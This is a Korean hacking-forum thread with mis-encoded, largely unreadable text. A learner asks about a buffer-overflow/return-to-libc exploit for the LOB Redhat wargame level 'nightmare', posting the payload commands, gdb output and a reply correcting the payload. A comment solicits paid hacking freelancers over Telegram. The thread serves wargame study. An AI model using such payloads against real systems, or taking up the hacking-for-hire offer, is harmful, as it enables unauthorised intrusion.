½Ã½ºÅÛ ÇØÅ·

 1574, 2/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   turttle2s
   [LOB Redhat] succubus -> nightmare

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1981 [º¹»ç]


µµÀúÈ÷ ÀÌÇØ°¡ ¾È°¡¼­ Áú¹®µå¸³´Ï´Ù


Á¦°¡ ¿øÇÏ´Â ½Ã³ª¸®¿À´Â,

strpy·Î 'AAAA'ÀÇ À§Ä¡¿¡ RTLÄڵ尡 µé¾îÀִ ȯ°æº¯¼öÀÇ ÁÖ¼Ò¸¦ º¹»çÇؼ­ strcpy°¡ ³¡³­ ÈÄ ret½Ã RTLÀÌ ½ÇÇàµÇ°Ô ÇÏ´Â °Í ÀÔ´Ï´Ù.

ÀÏ´Ü RTL Äڵ尡 µé¾îÀִ ȯ°æº¯¼ö¸¦ ¸¸µì´Ï´Ù.

================================================
$ export WEAPON=`python -c 'print "\xe0\x8a\x05\x40"+"aaaa"+"\xf9\xbf\x0f\x40"+"\x90"*1000'`
================================================
"\x90"*1000 Àº Á¦°¡ ȯ°æº¯¼ö À§Ä¡¸¦ ã±â ÆíÇÏ°Ô ÇϱâÀ§ÇØ Ãß°¡Çß½À´Ï´Ù.

ÀÌÁ¦ºÎÅÍ ÆíÀÇ»ó ȯ°æº¯¼ö¸¦ "RTL ÄÚµå" ¶ó°í ºÎ¸£°Ú½À´Ï´Ù.

±×¸®°í core ÆÄÀÏ »ý¼ºÀ» À§ÇØ ¾Æ·¡ payload¸¦ ³Ö½À´Ï´Ù.
================================================

./nightmare `python -c 'print "a"*44+"\x10\x84\x04\x08"+"AAAA"+"BBBB"+"CCCC"+"DDDD"'`
================================================

1. "AAAA"´Â ¹®Á¦¿¡¼­ ºÙ¿©ÁÖ´Â ¹®ÀÚ¿­ ÀÔ´Ï´Ù.
2. "BBBB"´Â "AAAA"ÀÇ ÁÖ¼ÒÀÔ´Ï´Ù. RTL ÄÚµåÀÇ ÁÖ¼Ò·Î ¹Ù²î°Ô ÇÒ °ÍÀÔ´Ï´Ù.
3. "CCCC"´Â "DDDD"ÀÇ ÁÖ¼ÒÀÔ´Ï´Ù. strcpy()¿¡¼­ CCCC¸¦ Æ÷ÀÎÅÍ·Î »ç¿ëÇϱ⠶§¹®¿¡ "AAAA"¿¡´Â "DDDD"°ªÀÌ µé¾î°¡°Ô µÉ°ÍÀÔ´Ï´Ù.
4. "DDDD"´Â RTL ÄÚµåÀÇ ÁÖ¼ÒÀÔ´Ï´Ù.


±×¸®°í gdb·Î core ÆÄÀÏÀ» ¿­¾îº¾´Ï´Ù.
================================================
strcpy (dest=0x42424242 <Address 0x42424242 out of bounds>, src=0x43434343 <Address 0x43434343 out of bounds>)
    at ../sysdeps/generic/strcpy.c:37
../sysdeps/generic/strcpy.c: No such file or directory.
================================================
ÀÏ´Ü strcpy.c °¡ ¾ø´Ù°í ¶å´Ï´Ù. (ÀÌ ¿À·ù°¡ ¿Ö ¶ß´ÂÁö´Â ¸ð¸£°Ú½À´Ï´Ù. óÀ½¿¡´Â gdb»ó¿¡¼­ Á¢±ÙÀÌ ¾ÈµÇ±â ¶§¹®¿¡ Àú·± ¿À·ù°¡ ¶ß´Â°É·Î ¾Ë°íÀÖ¾ú´Âµ¥ strcpyÀÇ ÄÚµå´Â À߸¸ º¸¿©ÁÖ´õ±º¿ä;;)



¿©±â¼­ ù¹ø°·Î ÀÌÇØ°¡ ¾ÈµÇ´Â ºÎºÐÀÔ´Ï´Ù.
================================================
(gdb) x/30wx $esp
0xbffff688:        "0x4000ae60"        0x61616161        0x41414141        0x42424242
0xbffff698:        0x43434343        0x44444444        0x00000000        0x08048420
0xbffff6a8:        0x00000000        0x08048441        0x080486b4        0x00000002
0xbffff6b8:        0xbffff6d4        0x08048350        0x0804877c        0x4000ae60
0xbffff6c8:        0xbffff6cc        0x40013e90        0x00000002        0xbffff7e0
0xbffff6d8:        0xbffff7ec        0x00000000        0xbffff82d        0xbffff84a
0xbffff6e8:        0xbffff863        0xbffff882        0xbffffc7e        0xbffffca0
0xbffff6f8:        0xbffffcae        0xbffffe71
================================================

Á¦°¡ "·Î ¹­¾î³õÀº ºÎºÐÀÔ´Ï´Ù.
Àú ÁÖ¼ÒÀÇ Äڵ带 º¸´Ï <_dl_fini> ºÎºÐÀ¸·Î ³ª¿À´õ±º¿ä.. ¿Ö °©ÀÚ±â Àú°Ô »ý°å´ÂÁö ¸ð¸£°Ú°í,
±× µÚÀÇ 4¹ÙÀÌÆ®¸¦ º¸½Ã¸é 0x61616161 ÀÌ µé¾îÀÖ½À´Ï´Ù. ¿ø·¡ strcpy@plt ÀÚ¸®¿¡ ¸»ÀÌÁÒ.


À̰͸»°íµµ ÀÌÇØ°¡ ¾ÈµÇ´Â ºÎºÐÀÌ ´õ Àִµ¥, ±ÛÀ» ¾²´Ùº¸´Ï ÀÌ ¹®Á¦¸¦ ¸ÕÀú ÇØ°áÇÏ°í ³ª¼­ »ðÁúÀ» ´õ ÇغÁ¾ß°Ú´Ù´Â »ý°¢¿¡ ÀÏ´Ü ¿©±â±îÁö¸¸ Áú¹®µå·Áº¾´Ï´Ù.

¼­Å¥¹ö½ºÇÑÅ× Á¦´ë·Î °É¸° °Í °°½À´Ï´Ù ¤Ð¤Ð¤Ð  here to stay.....





  Hit : 1650     Date : 2019/09/26 08:15



    
ss4747 ¾È³çÇϼ¼¿ä!!

¸ðÀÇÇØÅ· °¡´ÉÀÚ ¸ðÁý ÁßÀÎ Çؿܾ÷üÀÔ´Ï´Ù

¾÷¹«ÀÇ ÁøÇà¹æ½ÄÀº ÇÁ¸®·£¼­ Çü½ÄÀ¸·Î ÀúÈñ°¡ Á¦°øÇص帰

»çÀÌÆ® ¸ðÀÇÇØÅ· ¼º°ø½Ã °Ç´ç À¸·Î Áö±ÞÇص帳´Ï´Ù

ÀÚ¼¼ÇѾȳ»»çÇ×¹× ±âŸ¹®ÀÇ´Â ÅÚ·¡±×·¥ ss4747 ¿©±â·Î ¿¬¶ôÁÖ½Ã¸é »ó¼¼ÇÏ°Ô ¾Ë·Áµå¸®°Ú½À´Ï´Ù
2019/10/04  
dnjsdnwja "AAAA"À» ¿øÇÏ´Â return address("\xe0\x8a\x05\x40")·Î ¹Ù²Ù°í µÚÀÇ argument¸¦ passÇØÁÖ±â À§Çؼ­´Â, "CCCC"¿¡ DDDDÀÇ ÁÖ¼Ò¸¦ ³ÖÁö¾Ê°í ±× ÀÚ¸®¿¡ ±×³É DDDD¸¦ ³Ö¾î¾ß ÇÒ °ÍÀ¸·Î º¸À̳׿ä.

¸¸¾à "CCCC"¿¡ DDDDÀÇ ÁÖ¼Ò¸¦ ³ÖÀ¸½Å´Ù¸é "AAAA"¿¡´Â ±×³É ȯ°æº¯¼ö ÁÖ¼Ò¸¸ µé¾î°¡°í ÀÌ°ÍÀº ¿øÇϽô °á°ú°¡ ¾Æ´Ï¶ó°í »ý°¢µË´Ï´Ù.
2019/12/18  
turttle2s dnjsdnwja

´äº¯ °¨»çÇÕ´Ï´Ù. ÀÌÁ¦ ºÃ¾î¿ä ¤»¤» »ý°¢Çغ¸´Ï±î Á¦°¡ ½ÅÁßÄ¡ ¸øÇ߳׿ä..
2019/12/23  
  [LOB Redhat] succubus -> nightmare[3]     turttle2s
09/26 1649
1553   read()·Î got leakÀÌ °¡´ÉÇÑ°¡¿ä?[1]     turttle2s
09/26 1652
1552   pwntools ¾²½Ã´Â ºÐµé ~[6]     turttle2s
09/17 1866
1551   system("/bin/sh") ¿Í execve("/bin/sh",0,0)[2]     turttle2s
09/16 2374
1550   ROP Áú¹®ÀÔ´Ï´Ù[2]     turttle2s
09/09 2105
1549   BOF¸¦ ÇÏ´Â ÀÌÀ¯°¡ ¹«¾ùÀΰ¡¿ä?[7]     turttle2s
09/03 2354
1548   rop ´ÙÀ½¿¡ ¹¹¸¦ °øºÎÇÏ´Â°Ô ÁÁÀ»±î¿ä?[1]     tloet
08/26 1992
1547   [ LOB ] skeleton -> golem[3]     turttle2s
08/21 1549
1546   Á¦°¡ ½Ã½ºÅÛ ÇØÅ·ÂÊÀ¸·Î °¡º¸·Á ÇÕ´Ï´Ù.[3]     gun7935
08/01 1977
1545   PLT GOT Áú¹®[3]     turttle2s
07/30 1491
1544   setreuidÇÔ¼ö¿Í setuidºñÆ® °ü°è[1]     park345601
07/26 1333
1543   lob remote bof[6]     park345601
07/25 1422
1542   pwntools ¸¦ ÀÌ¿ëÇÑ exploit ÄÚµå Áú¹®[3]     turttle2s
06/07 1498
1541   Á»ºñ ¹ÙÀÌ·¯½º ¹®ÀÇ °Ç[1]     kirr2
04/14 1819
1540     [re] Á»ºñ ¹ÙÀÌ·¯½º ¹®ÀÇ °Ç     ÇѽÂÀç
05/23 1380
1539   ¹é½Å¿ìȸÁú¹®µå¸³´Ï´Ù (¾Ç¿ë¸ñÀû¾Æ´Ï¿¡¿ë)[3]     kangyung0447
03/01 2018
1538   pythonÀ¸·Î ÀÎÀÚ¸¦ ³ÖÀ» ¶§[1]     turttle2s
02/23 1558
1537   GOT Overwrite[6]     turttle2s
01/31 1840
1536   RTL Áú¹® ÀÔ´Ï´Ù[4]     turttle2s
01/11 2732
1535   iptime a3004nd uart¸¦ ÅëÇÑ ½© Á¢±Ù ½Ãµµ Áú¹®µå¸³´Ï´Ù.[1]     cho6206
12/30 3971
[1] 2 [3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org